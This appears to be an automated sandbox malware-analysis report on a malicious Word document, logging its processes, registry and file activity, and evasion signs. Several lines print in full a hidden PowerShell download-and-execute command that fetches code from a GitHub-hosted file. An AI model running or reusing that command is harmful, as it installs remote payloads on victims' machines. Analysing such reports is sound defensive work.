Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....(W..............................}..v.....W......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....................................}..v............0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....................................}..v............0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v....x"......0.......................~....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....0#..............................}..v.....#......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.5. .c.h.a.r.:.1.8...............}..v.....'......0.................W....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....x(..............................}..v.....(......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v...../......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....x0..............................}..v.....0......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............u.t.F.i.l.e. .".s.t.a.r.t...c.m.d.".............}..v.....5......0.................W.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj.....5..............................}..v....@6......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v.....=......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj.....=..............................}..v....@>......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....pB......0.................W.....4....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....(C..............................}..v.....C......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v.....H......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj.....I..............................}..v.... J......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .......P.Sj....P.W.............................}..v.....M......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....hN..............................}..v.....N......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.Sj....P.W.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................Sj....`...............................}..v............0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'.......n.n.o.t. .f.i.n.d. .t.h.e. .f.i.l.e. .s.p.e.c.i.f.i.e.d.........0.................W.....:....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'.................Sj....................................}..v....X.......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....3.......A.t. .l.i.n.e.:.7. .c.h.a.r.:.1.4...............}..v....h.......0.................W....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....3.................Sj.... ...............................}..v............0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....?...............P.Sj....P.W.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....?.................Sj....................................}..v....@.......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....K...............P.Sj....P.W.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....K.................Sj....................................}..v....@.......0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....W....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....X.......0.................W.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....W.................Sj....................................}..v............0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....c...............P.Sj....P.W.............................}..v....X.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....c.................Sj....................................}..v............0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....o....... . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................W.....<....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....o.................Sj....................................}..v............0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....{....... .......P.Sj....P.W.............................}..v............0.................W............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....{.................Sj....P...............................}..v............0.................W............................. Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3') Jump to behavior
Source: RfORrHIRNe.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ORrHIRNe.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD815.tmp Jump to behavior
Source: classification engine Classification label: mal88.expl.winDOC@3/10@3/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: RfORrHIRNe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: RfORrHIRNe.doc OLE document summary: title field not present or empty
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DFA094A62AA4BA8959.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFA094A62AA4BA8959.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFA094A62AA4BA8959.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3') Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Stores large binary data to the registry
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000001.00000002.418333433.000000000028E000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
